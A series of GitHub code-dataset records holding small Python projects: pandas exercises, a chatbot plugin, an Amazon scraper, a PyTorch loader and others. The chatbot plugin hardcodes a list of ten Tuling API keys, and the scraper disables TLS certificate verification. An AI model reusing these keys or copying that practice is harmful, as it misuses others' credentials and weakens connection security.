mean_ratings.sort_values(by='F', ascending=False)\n\n\n# In[21]:\n\n\ntop_female_ratings[:10]\n\n\n# In[22]:\n\n\n# Compute the rating difference between genders\n\n\n# In[23]:\n\n\nmean_ratings['diff'] = mean_ratings['M'] - mean_ratings['F']\n\n\n# In[24]:\n\n\nsorted_by_diff = mean_ratings.sort_values(by='diff')\n\n\n# In[25]:\n\n\nsorted_by_diff[:10]\n\n\n# In[26]:\n\n\nsorted_by_diff[::-1][:10]\n\n\n# In[27]:\n\n\nrating_std_by_title = data.groupby('title')['rating'].std()\n\n\n# In[28]:\n\n\nrating_std_by_title = rating_std_by_title.loc[active_titles]\n\n\n# In[30]:\n\n\n# Sort the Series by rating standard deviation in descending order\n\n\n# In[ ]:\n\n\nrating_std_by_title.sort_values(ascending=False)[:10]\n\n","repo_name":"jeongilpum/pythonData","sub_path":"data/MovieLens의 영화 평점 데이터.py","file_name":"MovieLens의 영화 평점 데이터.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21472143598","text":"# x=10\n# print(\"This is a test\")\n# if x>5:\n#     raise Exception(\"x cannot take a value greater than 5\")\n\n# def check_password(psw):\n#     import re\n\n#     if len(psw)<8:\n#         raise Exception(\"The password must be at least 8 characters long\")\n#     elif not re.search(\"[a-z]\",psw):\n#         raise Exception(\"the password must contain a lowercase letter.\")\n#     elif not re.search(\"[A-Z]\",psw):\n#         raise Exception(\"the password must contain an uppercase letter.\")\n#     elif not re.search(\"[1-9]\",psw):\n#         raise Exception(\"the password must contain a digit.\")\n#     elif not re.search(\"[@$]\",psw):\n#         raise Exception(\"the password must contain a special character\")\n\n#     else:\n#         print(\"A valid password was entered\") \n\n# password=\"1234567@1aA\"\n\n# try:\n#     check_password(password)\n# except Exception as ex:\n#     print(ex)\n# finally:\n#     print(\"validation completed\") \n\n\nclass Person:\n    def __init__(self,name,year):\n        if len(name)>10:\n            raise Exception(\"the name field contains too many characters\")\n        else:\n            self.name=name\n            self.year=year\np=Person(\"Fayikkkkkkk\",1998)\n","repo_name":"Fayikk/Work_To_Python","sub_path":"Error_Object_Create.py","file_name":"Error_Object_Create.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"tr","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"28173645","text":"l = []\ntmp_sc = set()\nfor _ in range(int(input())):\n    name = input()\n    score = float(input())\n\n    l.append([name, score])\n    tmp_sc.add(score)\n\ntmp_sc = sorted(list(tmp_sc))\nans = []\nfor i in l:\n    if tmp_sc[1] == i[1]:\n        ans.append(i[0])\nans.sort()\nfor j in ans:\n    print(j)\n","repo_name":"mizutaninaoki/AtCoderPractice","sub_path":"hacker_rank/Nested Lists.py","file_name":"Nested Lists.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10668406887","text":"import os\nimport sys\nfrom test.testutil import parse_args\nfrom runners.test_runner import TestRunner\nimport train_unet as unet\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))\n\ntest = dict(\n    data=dict(\n        dataset=dict(\n            type=unet.dataset_type,\n            root=unet.dataset_root,\n            imglist_name='val.txt',\n            multi_label=False,\n        ),\n        transforms=unet.inference['transforms'],\n        sampler=dict(\n            type='DefaultSampler',\n        ),\n        dataloader=dict(\n            type='DataLoader',\n            samples_per_gpu=4,\n            workers_per_gpu=4,\n            shuffle=False,\n            drop_last=False,\n            pin_memory=True,\n        ),\n    ),\n)\n\n\ndef main():\n    args = parse_args()\n    out = os.path.join(unet.root_out, 
'unet')\n    os.makedirs(out, exist_ok=True)\n    runner = TestRunner(unet.nclasses, out, False, True, test, unet.inference)\n    runner.load_from_checkpoint(args.checkpoint)\n    runner()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"shivkhattar/Semantic-Segmentation","sub_path":"test_unet.py","file_name":"test_unet.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13183995252","text":"\nimport json,random\nfrom typing import Optional\n\nimport aiohttp\nfrom aiocqhttp.message import escape\nfrom nonebot import on_command, CommandSession\nfrom nonebot import on_natural_language, NLPSession, IntentCommand\nfrom nonebot.helpers import context_id, render_expression\n\nfrom .what_trash import trash_sorter\n\n# Define the fallback \"expressions\" used when no Tuling reply can be obtained\nEXPR_DONT_UNDERSTAND = (\n    '我现在还不太明白你在说什么呢,但没关系,以后的我会变得更强呢!',\n    '我有点看不懂你的意思呀,可以跟我聊些简单的话题嘛',\n    '其实我不太明白你的意思……',\n    '抱歉哦,我现在的能力还不能够明白你在说什么,但我会加油的~'\n)\n\nkeys_list = [\"780ac68dd9ca4ba58374b0f3db1a9b18\",\"6a26db99154248809f0b3b750d5098c6\",\n             \"b6aab09b04ef41898b85f60e18b69940\", \"6d73e92a7e594687ad8f268b4cb3d2f4\",\n             \"ae7caaf2308a40179476062a857615e4\",\"8b5f30f5caed4196a21ab0887eef1858\",\n             \"b424b32b20d9433eb4109c1b07d51bcc\",\"e2c43a8914eb4c98b35dda132cad5244\",\n             \"aba3823f0b8945cc9edaff7df1219bf5\",\"cd19cd742df240e287caa0e366472c89\"]\n# Register a command for internal use only; no aliases are needed\n@on_command('tuling')\nasync def tuling(session: CommandSession):\n    # Get the optional argument; without a 'message' argument the command is not interrupted and message will be None\n    message = session.state.get('message')\n\n    # Get the Tuling bot's reply through the wrapper function below\n    reply = await call_tuling_api(session, message)\n\n    def if_at():\n        _at = [True,False,False,False]\n        return random.choice(_at)\n    if reply:\n        # If the Tuling call succeeded and returned a reply, escape it and send it to the user\n        # Escaping converts certain special characters so CoolQ does not interpret them as CQ codes\n        await session.send(escape(reply),at_sender=if_at())\n    else:\n        # If the call failed, or returned content we cannot handle yet, send a fallback expression\n        # render_expression() renders an \"expression\" into a string message\n        await session.send(render_expression(EXPR_DONT_UNDERSTAND),at_sender=if_at())\n\n\n@on_natural_language\nasync def _(session: NLPSession):\n    # Return the tuling command with confidence 60.0\n    # This ensures the tuling command is used if and only if no other natural language processor understands the message\n    # print(session.ctx['message'])# message content\n    # print(session.ctx)# some users hit a UnicodeEncodeError here\n    msg = str(session.ctx['message'])\n    msg_type = str(session.ctx['message_type'])\n    to_me = str(session.ctx['to_me'])\n    # print('-------------------------------')\n    # print(msg,type(msg))\n    # print(len(msg),msg[1:])\n    # print('-------------------------------')\n\n    if (len(msg) > 5) and ('什么垃圾' in msg[1:]):\n        print('========')\n        us_data = await trash_sorter(msg)\n        if msg_type == 'group' and to_me == 'True':\n            # print(2222222,str(session.ctx['user_id']))\n            await session.send(us_data,at_sender=True)\n            pass\n        else:\n            await session.send(us_data)\n            pass\n    else:\n        return IntentCommand(60.0, 'tuling', args={'message': session.msg_text})\n\n\nasync def call_tuling_api(session: CommandSession, text: str) -> Optional[str]:\n    # Call the Tuling bot API to get a reply\n\n    if not text:\n        return None\n\n    url = 'http://openapi.tuling123.com/openapi/api/v2'\n\n    # Build the request payload\n    payload = {\n        'reqType': 0,\n        'perception': {\n            'inputText': {\n                'text': text\n            }\n        },\n        'userInfo': {\n            # 'apiKey': session.bot.config.TULING_API_KEY,\n            'apiKey': random.choice(keys_list),\n            'userId': context_id(session.ctx, use_hash=True)\n        }\n    }\n\n    group_unique_id = context_id(session.ctx, mode='group', use_hash=True)\n    if group_unique_id:\n        payload['userInfo']['groupId'] = group_unique_id\n\n    try:\n        # Send the final request with the aiohttp library\n        async with aiohttp.ClientSession() as sess:\n            async with sess.post(url, json=payload) as response:\n                if response.status != 200:\n                    # An HTTP status code other than 200 means the call failed\n                    return None\n\n                resp_payload = json.loads(await response.text())\n                if resp_payload['results']:\n                    for result in resp_payload['results']:\n                        if result['resultType'] == 'text':\n                            # Return the text-type reply\n                            return result['values']['text']\n    except (aiohttp.ClientError, json.JSONDecodeError, KeyError):\n        # Any of the exceptions above means the call failed\n        return None","repo_name":"65wu/robot_hao","sub_path":"haohao/awesome/plugins/tuling123.py","file_name":"tuling123.py","file_ext":"py","file_size_in_byte":4879,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33447517771","text":"import requests\nimport re\nimport datetime\nimport pymongo\n\nfrom bs4 import BeautifulSoup\n\n\ndef extract_url(url):\n\n    # This function takes an Amazon India URL such as:\n    # https://www.amazon.in/Samsung-Galaxy-M30-Gradation-Blue/dp/B07HGJJ58K/ref=br_msw_pdt-1?_encoding=UTF8&smid=A1EWEIV3F4B24B&pf_rd_m=A1VBAL9TL5WCBF&pf_rd_s=&pf_rd_r=VFJ98F93X80YWYQNR3GN&pf_rd_t=36701&pf_rd_p=9806b2c4-09c8-4373-b954-bae25b7ea046&pf_rd_i=desktop\n    # and converts it to the shorter URL\n    # https://www.amazon.in/dp/B07HGJJ58K which is more manageable. Also, if the URL is not a valid www.amazon.in URL then it returns None\n\n    if url.find('www.amazon.in') != -1:\n        index = url.find('/dp/')\n        \n        if index != -1:\n            index2 = index + 14\n            url = 'https://www.amazon.in' + url[index:index2]\n\n        else:\n            index = url.find('/gp/')\n\n            if index != -1:\n                index2 = index + 22\n                url = 'https://www.amazon.in' + url[index:index2]\n\n            else:\n                url = None\n\n    else:\n        url = None\n\n    return url\n\n\ndef get_converted_price(price):\n\n    # stripped_price = price.strip(\"$ ,\")\n    # replaced_price = stripped_price.replace(',', '')\n    # converted_price = float(replaced_price)\n\n    converted_price = float(re.sub(r'[^\\d.]', '', price))\n\n    return converted_price\n\n\ndef get_product_details(url):\n\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 \"\n                      \"(KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\"\n    }\n    details = {\n        \"name\": \"\",\n        \"price\": 0,\n        \"deal\": True,\n        \"url\": \"\"\n    }\n\n    _url = extract_url(url)\n    if _url is None:\n        details = None\n\n    else:\n        page = requests.get(url, headers=headers, verify=False)\n        soup = BeautifulSoup(page.content, 'html5lib')\n\n        title = soup.find(id='productTitle')\n        price = soup.find(id='priceblock_dealprice')\n        if price is None:\n            price = soup.find(id='priceblock_ourprice')\n            details['deal'] = False\n\n        if title is not None and price is not None:\n            details['name'] = title.get_text().strip()\n            details['price'] = get_converted_price(price.get_text())\n            details['url'] = _url\n        else:\n            return None\n\n    return details\n\n\ndef add_product_detail(details):\n\n    new = db['products']\n    ASIN = details['url'][len(details['url'])-10:]\n    details['date'] = datetime.datetime.utcnow()\n\n    try:\n\n        new.update_one(\n            {\n                'asin': ASIN\n            },\n            {\n                '$set': {\n                    'asin': ASIN\n                },\n                '$push': {\n                    'details': details\n                }\n            },\n            upsert=True\n        )\n        return True\n\n    except Exception as identifier:\n\n        print(identifier)\n        return False\n\ndef get_product_history(asin):\n\n    pass\n\n\nif __name__ == '__main__':\n\n    client = pymongo.MongoClient('mongodb://localhost:27017/')\n    db = client['amazon']\n\n    
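# quick smoke test: fetch and print the details of one sample product page\n    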
print(get_product_details(\"https://www.amazon.com/Samsung-Factory-Unlocked-Warranty-Midnight/dp/B07HR4FVDG/ref=sr_1_1?keywords=samsung+galaxy+note+9&qid=1566209728&s=gateway&sr=8-1\"))\n","repo_name":"degru82/datasci_by_casestudy","sub_path":"ep03_amazon/amazon_price_tracker.py","file_name":"amazon_price_tracker.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3891632459","text":"import re\n\nimport pydot\n\n\nclass Morph:\n def __init__(self, surface, base, pos, pos1):\n self.surface = surface\n self.base = base\n self.pos = pos\n self.pos1 = pos1\n\n def __str__(self):\n return \"surface:{}\\tbase:{}\\tpos:{}\\tpos1:{}\".format(self.surface, self.base, self.pos, self.pos1)\n\n\nclass Chunk:\n def __init__(self, dst=-1):\n self.morphs = []\n self.dst = dst\n self.srcs = []\n\n def __str__(self):\n return \"{}\\tsrcs:{}\\tdst:{}\".format(self.surface, self.srcs, self.dst)\n\n @property\n def surface(self):\n morphs = [morph for morph in self.morphs if morph.pos != \"記号\"]\n return \"\".join(map(lambda morph: morph.surface, morphs))\n\n @property\n def has_depend(self):\n return self.dst != -1\n\n def has_pos(self, pos):\n return any([morph.pos == pos for morph in self.morphs])\n\n def get_morphs_by_pos(self, pos):\n morphs = [morph for morph in self.morphs if morph.pos == pos]\n if morphs:\n return morphs[0]\n return \"\"\n\n def get_morphs_surfaces_by_pos(self, pos):\n return [(morph.base, self.surface) for morph in self.morphs if morph.pos == pos]\n\n @property\n def has_sahen_wo(self):\n return bool(self.get_sahen_wo())\n\n def get_sahen_wo(self):\n for i, morph in enumerate(self.morphs[:-1]):\n if morph.pos == \"名詞\" and morph.pos1 == \"サ変接続\":\n next_morph = self.morphs[i + 1]\n if next_morph.pos == \"助詞\" and next_morph.surface == \"を\":\n return morph.surface + \"を\"\n return \"\"\n\n def path_to_root(self, sentence):\n return [self] + sentence[self.dst].path_to_root(sentence) if self.has_depend else [self]\n # path = []\n # chunk = self\n # while chunk.has_depend:\n # path.append(chunk.surface)\n # chunk = sentence[chunk.dst]\n # path.append(chunk.surface)\n # return path\n\n\ndef dependencies(filename=\"../data/neko.txt.cabocha\"):\n exp = re.compile(\"^\\*\\s(?P\\d+)\\s(?P-?\\d+)D\")\n chunks = []\n chunk = Chunk()\n\n with open(filename) as lines:\n for line in lines:\n if line == \"EOS\\n\":\n if chunk.morphs:\n chunks.append(chunk)\n if chunks:\n for i, chunk in enumerate(chunks):\n if chunk.dst > -1:\n chunks[chunk.dst].srcs.append(i)\n yield chunks\n chunk = Chunk()\n chunks = []\n else:\n if line[0] == \"*\":\n dst = int(exp.search(line).group('dst'))\n if chunk.morphs:\n chunks.append(chunk)\n chunk = Chunk(dst)\n else:\n line = line.replace(\"\\t\", \",\")\n values = line.split(\",\")\n chunk.morphs.append(Morph(\n values[0],\n values[7],\n values[1],\n values[2]\n ))\n raise StopIteration\n\n\ndef graph_from_edges(edges):\n graph = pydot.Dot(graph_type='digraph')\n\n for edge in edges:\n id1, label1, id2, label2 = str(edge[0][0]), str(edge[0][1]), str(edge[1][0]), str(edge[1][1])\n\n graph.add_node(pydot.Node(id1, label=label1))\n graph.add_node(pydot.Node(id2, label=label2))\n\n graph.add_edge(pydot.Edge(id1, id2))\n\n return graph\n\n\nclass Dependant:\n def __init__(self, predicate):\n self.subject = \"\"\n self.predicate = predicate\n self.object = \"\"\n\n def set_subject(self, subject):\n self.subject = subject\n\n def set_object(self, object):\n self.object 
= object\n\n    def has_all_attribute(self):\n        return all([bool(self.subject), bool(self.predicate), bool(self.object)])\n","repo_name":"Cain96/nlp100","sub_path":"chap5/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34857271556","text":"from .models import Graditude, User \n\ndef getUserGrats():\n    name = 'Adi'\n    user = User.objects.get(pk=1)\n\n    #normally, we would query for the active user and a date range\n    all_entries = Graditude.objects.all()\n\n    txt = ''\n    for entry in all_entries:\n        txt = txt + str(entry)  # cast the model instance to str; concatenating the object itself raises a TypeError\n    return txt\n","repo_name":"abigail432/daily_gratitude","sub_path":"daily_gratitude/daily_grat/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11062370727","text":"# The pipeline API requires imports.\nfrom zipline.api import attach_pipeline, pipeline_output, update_universe\nfrom zipline.pipeline import Pipeline\nfrom zipline.pipeline.data import USEquityPricing\nfrom zipline.pipeline.factors import SimpleMovingAverage\n\ndef initialize(context):\n\n    # Create, register and name a pipeline in initialize.\n    pipe = Pipeline()\n    attach_pipeline(pipe, 'example')\n\n    # Construct a simple moving average factor and add it to the pipeline.\n    sma_short = SimpleMovingAverage(inputs=[USEquityPricing.close], window_length=10)\n    pipe.add(sma_short, 'sma_short')\n\n    # Set a screen on the pipelines to filter out securities.\n    pipe.set_screen(sma_short > 1.0)\n\n\ndef before_trading_start(context, data):\n    # Pipeline_output returns the constructed dataframe.\n    output = pipeline_output('example')\n\n    # Select and update your universe.\n    context.my_universe = output.sort('sma_short', ascending=False).iloc[:200]\n    update_universe(context.my_universe.index)\n\n\ndef handle_data(context, data):\n    log.info(\"\\n\" + str(context.my_universe.head(5)))\n","repo_name":"mequanta/z-runner","sub_path":"examples/quanto/using_pipelines.py","file_name":"using_pipelines.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10152709675","text":"import cv2\n# import src.cv.makeup.utils as mutils\n\n# mutils.start_cam()\n# mutils.enable_makeup('eyeshadow', 34, 74, 162, .7)\n# mutils.enable_makeup('blush', 87, 36, 51, .5)\n# mutils.enable_makeup('eyeliner', 142, 30, 29, .5)\n# mutils.enable_makeup('lipstick', 142, 30, 29, gloss=False, lipstick_type='soft')\n# # mutils.enable_makeup('concealer', 200, 10, 20, 1)\n# # mutils.enable_makeup('foundation', 255, 253, 208, .3)\n# while True:\n#     cv2.imshow(\"Frame\", mutils.apply_makeup_video())\n#     key = cv2.waitKey(1) & 0xFF\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom src.cv.simulation.apply_foundation import Foundation\nfrom src.settings import SHAPE_68_PATH, SHAPE_81_PATH\nimport dlib\n\ndetector = dlib.get_frontal_face_detector()\nface_pose_predictor_68 = dlib.shape_predictor(SHAPE_68_PATH)\nface_pose_predictor_81 = dlib.shape_predictor(SHAPE_81_PATH)\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n    x_68 = []\n    y_68 = []\n    x_81 = []\n    y_81 = []\n\n    # img = cv2.imread('face.jpg')\n    _, img = cap.read()\n\n    gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n    frame = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n    face = detector(gray, 0)[0]\n\n    pose_landmarks = face_pose_predictor_68(gray, face)\n\n    for i in 
range(68):\n        x_68.append(int(((pose_landmarks.part(i).x))))\n        y_68.append(int(((pose_landmarks.part(i).y))))\n\n\n    a = np.min(x_68[36:41])\n    b = np.max(x_68[36:41])\n    c = np.min(y_68[36:41])\n    d = np.max(y_68[36:41])\n\n    img = img[c:d, a:b]\n\n    # ret,thresh1 = cv2.threshold(gray, 80, 255, cv2.THRESH_BINARY)\n\n    # pose_landmarks = face_pose_predictor_81(gray, face)\n    # for i in range(81):\n    #     x_81.append(int(((pose_landmarks.part(i).x))))\n    #     y_81.append(int(((pose_landmarks.part(i).y))))\n\n    # y_68 = np.array(y_68)\n\n    # y_68 += 10\n\n    # foundation = Foundation()\n\n    # res = foundation.apply_foundation(frame, x_81, y_81, x_68, y_68, 255, 253, 208, 81, 81, 1)\n\n    # cv2.imshow('frame', cv2.cvtColor(res, cv2.COLOR_RGB2BGR))\n    # cv2.waitKey(0)\n\n    # fig, (ax1, ax2) = plt.subplots(1, 2)\n    # xs, ys = np.r_[x_68[1:17], x_81[68:81]], np.r_[y_68[1:17], y_81[68:81]]\n\n    # for x, y in zip(x_68, y_68):\n    #     img = cv2.circle(img, (x, y), 1, (0, 0, 255), -1)\n\n    # img = img[np.c_[x_68[36:42], y_68[36:42]]]\n\n\n    cv2.imshow('frame', img)\n    key = cv2.waitKey(1) & 0xFF\n    # cv2.waitKey(0)\n    # ax1.scatter(y_68[1:17], y_81[68:81])","repo_name":"fazixa/VirtualMirror-Server","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30817176696","text":"#%% Change working directory from the workspace root to the ipynb file location. Turn this addition off with the DataScience.changeDirOnImportExport setting\nimport os\ntry:\n\tos.chdir(os.path.join(os.getcwd(), 'homework'))\n\tprint(os.getcwd())\nexcept:\n\tpass\n#%% [markdown]\n# # Common DataFrame operations\n# * merge / transform\n# * subset\n# * groupby\n\n#%%\n# Import the required packages\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nget_ipython().magic('matplotlib inline')\n\n\n#%%\n# Set data_path\ndir_data = './data/'\n\n#%%\nf_app = os.path.join(dir_data, 'application_train.csv')\nprint('Path of read in data: %s' % (f_app))\napp_train = pd.read_csv(f_app)\n\n#%% [markdown]\n# ## Homework\n# 1. Split CNT_CHILDREN in app_train into four groups according to the rules below,\n#    and store the result in the original dataframe as CNT_CHILDREN_GROUP\n#     * 0 children\n#     * 1 - 2 children\n#     * 3 - 5 children\n#     * more than 5 children\n# \n# 2. For each CNT_CHILDREN_GROUP and TARGET group, list the mean AMT_INCOME_TOTAL and draw a boxplot\n# 3. For each CNT_CHILDREN_GROUP and TARGET group, compute the [Z-score](https://en.wikipedia.org/wiki/Standard_score) of AMT_INCOME_TOTAL\n\n#%%\n# play around with pd.cut\npd.cut(np.array([1, 7, 5, 4, 6, 3]), 3)\npd.cut(np.array([1, 7, 5, 4, 6, 3]), [0,3,7])\npd.cut(np.array([1, 7, 5, 4, 6, 3]), [0,3,7], False)\n\n#%%\n#1\ncut_rule = [-0.1, 0, 2, 5, float(\"inf\")]\nlabels = [\"a\",\"b\",\"c\",\"d\"]\napp_train['CNT_CHILDREN_GROUP'] = pd.cut(app_train['CNT_CHILDREN'].values, cut_rule, include_lowest=True, labels=labels)\napp_train['CNT_CHILDREN_GROUP'].value_counts()\n\n\n#%%\n#2-1\ngrp = ['CNT_CHILDREN_GROUP']\ngrouped_df = app_train.groupby(grp)['AMT_INCOME_TOTAL']\ngrouped_df.mean()\n\n\n#%%\n#2-2\nplt_column = ['AMT_INCOME_TOTAL']\nplt_by = ['CNT_CHILDREN_GROUP']\n\napp_train.boxplot(column=plt_column, by = plt_by, \n                  showfliers = False, figsize=(12,12))\nplt.suptitle('')\nplt.show()\n\n\n#%%\n#3\ndata_mean = app_train['AMT_INCOME_TOTAL'].mean()\ndata_std = app_train['AMT_INCOME_TOTAL'].std()\napp_train['AMT_INCOME_TOTAL_Z_BY_CHILDREN_GRP-TARGET'] = grouped_df.apply(lambda x: (x-data_mean)/data_std)\napp_train[['AMT_INCOME_TOTAL','AMT_INCOME_TOTAL_Z_BY_CHILDREN_GRP-TARGET']].head()\n\n\n","repo_name":"chiyu1468/2nd-ML100Days","sub_path":"homework/Day_008_HW.py","file_name":"Day_008_HW.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41604399385","text":"from terrain import Tile as t\nfrom rover import Rover as r\nfrom planet import Planet as p\n\ndef load_level(filename):\n\t\"\"\"\n\tLoads the level and returns an object of your choosing\n\t\"\"\"\n\ttile_content=[]\n\twith open(filename,'r') as game:\n\t\tread=game.readlines()\n\t\tfor line in read:\n\t\t\tline=line.strip('\\n')\n\t\t\tif 'name' in line:\n\t\t\t\tname,true_name=line.split(',')\n\t\t\t\ttile_content.append(true_name)\n\t\t\telif 'width' in line:\n\t\t\t\twidth,parameter_1=line.split(',')\n\t\t\t\tno_1=int(parameter_1)\n\t\t\t\ttile_content.append(no_1)\n\t\t\telif 'height' in line:\n\t\t\t\theight,parameter_2=line.split(',')\n\t\t\t\tno_2=int(parameter_2)\n\t\t\t\ttile_content.append(no_2)\n\t\t\telif 'rover' in line:\n\t\t\t\trover,x_coordinate,y_coordinate=line.split(',')\n\t\t\t\tx=int(x_coordinate)\n\t\t\t\ty=int(y_coordinate)\n\t\t\t\ttile_content.append(x)\n\t\t\t\ttile_content.append(y)\n\t\t\telif 'plains' in line:\n\t\t\t\tset_for_tile=line.split(',')\n\t\t\t\tif len(set_for_tile)==2:\n\t\t\t\t\tterrain_type=set_for_tile[0]\n\t\t\t\t\televation=set_for_tile[1]\n\t\t\t\t\ttile=t(terrain_type,elevation)\n\t\t\t\t\ttile_content.append(tile)\n\t\t\t\telif len(set_for_tile)==3:\n\t\t\t\t\tterrain_type=set_for_tile[0]\n\t\t\t\t\televation=set_for_tile[1:]\n\t\t\t\t\ttile=t(terrain_type,elevation)\n\t\t\t\t\ttile_content.append(tile)\n\t\t\telif 'shaded' in line:\n\t\t\t\tset_for_tile=line.split(',')\n\t\t\t\tif len(set_for_tile)==2:\n\t\t\t\t\tterrain_type=set_for_tile[0]\n\t\t\t\t\televation=set_for_tile[1]\n\t\t\t\t\ttile=t(terrain_type,elevation)\n\t\t\t\t\ttile_content.append(tile)\n\t\t\t\telif len(set_for_tile)==3:\n\t\t\t\t\tterrain_type=set_for_tile[0]\n\t\t\t\t\televation=set_for_tile[1:]\n\t\t\t\t\ttile=t(terrain_type,elevation)\n\t\t\t\t\ttile_content.append(tile)\n\treturn tile_content\n","repo_name":"Altoid76/MyHomeworks","sub_path":"Games/Rover/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"70145099690","text":"# -*- coding: utf-8 -*-\nimport datetime\n\n# Stores the last id assigned\nlast_id = 0\nclass Mensaje:\n    \"\"\" Represents a message in an inbox;\n    messages can be added, edited and deleted. \"\"\"\n    \n    def __init__(self,from_number=\"\",time_arrived=\"\",text_of_sms=\"\",has_been_viewed=\"\"):\n        \"\"\"\n        Initialize a message with the from_number,\n        time_arrived, text_of_sms and has_been_viewed values supplied by the user.\n        Automatically sets the creation date and a unique id.\n        \"\"\"\n        self.creation_date = datetime.date.today()\n        global last_id\n        last_id += 1\n        self.id = last_id\n        self.from_number = from_number\n        self.time_arrived = datetime.date.today()\n        self.text_of_sms = text_of_sms\n        self.has_been_viewed = False\n\n\n    def search(self, filter):\n        \"\"\"\n        Determine whether the filter value is contained in\n        the message (case-sensitive).\n        Returns True if it matches, or False otherwise.\n        \"\"\"\n        # has_been_viewed is a boolean and cannot be searched with 'in';\n        # search the message text and the sender number instead\n        return filter in self.text_of_sms or filter in self.from_number\n\n    ","repo_name":"EvoraHn/App_Mensajer-a_Sms","sub_path":"mensaje.py","file_name":"mensaje.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7621225999","text":"file = open(\"inputs.txt\", \"r\")\r\nvalues = file.read()\r\nrounds = values.splitlines()\r\n\r\nroundsarray = []\r\ntotalcalories = []\r\ntotal = 0\r\n\r\nfor moves in rounds:\r\n    opponent, mymove = moves.split(' ')\r\n    roundsarray.append([opponent, mymove])\r\n\r\nprint(roundsarray)\r\n\r\npoints = 0\r\nfor round in roundsarray:\r\n    if round[1] == 'X':\r\n        points = points + 1\r\n    elif round[1] == 'Y':\r\n        points = points + 2\r\n    elif round[1] == 'Z':\r\n        points = points + 3\r\n\r\n    if round[0] == 'A' and round[1] == 'X':\r\n        points = points+3\r\n    elif round[0] == 'B' and round[1] == 'Y':\r\n        points = points+3\r\n    elif round[0] == 'C' and round[1] == 'Z':\r\n        points = points+3\r\n    elif round[0] == 'A' and round[1] == 'Y':\r\n        points = points+6\r\n    elif round[0] == 'A' and round[1] == 'Z':\r\n        points = points+0\r\n    elif round[0] == 'B' and round[1] == 'X':\r\n        points = points+0\r\n    elif round[0] == 'B' and round[1] == 'Z':\r\n        points = points+6\r\n    elif round[0] == 'C' and round[1] == 'X':\r\n        points = points+6\r\n    elif round[0] == 'C' and round[1] == 'Y':\r\n        points = points+0\r\n\r\nprint(points)\r\n","repo_name":"ssabhijith2000/advent-of-code","sub_path":"day2/qn3.py","file_name":"qn3.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36535199343","text":"import torch\nfrom torch.utils.data import Dataset\n\n\nimport os\nimport cv2\nimport numpy as np\n\n\nclass COCODataset(Dataset):\n    def __init__(\n        self,\n        annot_path,\n        img_size=416,\n    ):\n\n        self.img_size = img_size\n        self.annot_path = annot_path\n        self.annotations = self.load_annotations()\n\n\n\n\n    def load_annotations(self):\n\n        final_annotations = []\n        with open(self.annot_path, 'r') as f:\n            txt = f.read().splitlines()\n            annotations = [line.strip() for line in txt if len(line.strip().split()[1:]) != 0]\n        \n        \n        for annotation in annotations:\n            line = annotation.split()\n            image_path, index = \"\", 1\n            for i, one_line in enumerate(line):\n                \n                if not one_line.replace(\",\",\"\").isnumeric():\n                    if image_path != \"\": image_path += \" \"\n                    image_path += one_line\n                else:\n                    index = i\n                    break\n            \n            if not os.path.exists(image_path):\n                raise KeyError(f\"{image_path} does not exist ... \")\n            \n            final_annotations.append([image_path, line[index:]])\n\n        return final_annotations\n\n\n    def __len__(self):\n        return len(self.annotations)\n\n    def __getitem__(self, idx):\n        item = self.annotations[idx]\n\n        img_path = item[0]\n        bboxes = item[1]\n\n        detections = []\n        for i in range(len(bboxes)):\n            detections.append([int(item) for item in bboxes[i].split(\",\") ])\n\n        return img_path, np.array(detections)\n\n","repo_name":"151ali/triton-inference-server-examples","sub_path":"evaluation/detection/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34376713813","text":"\"\"\"collegeManagement URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a 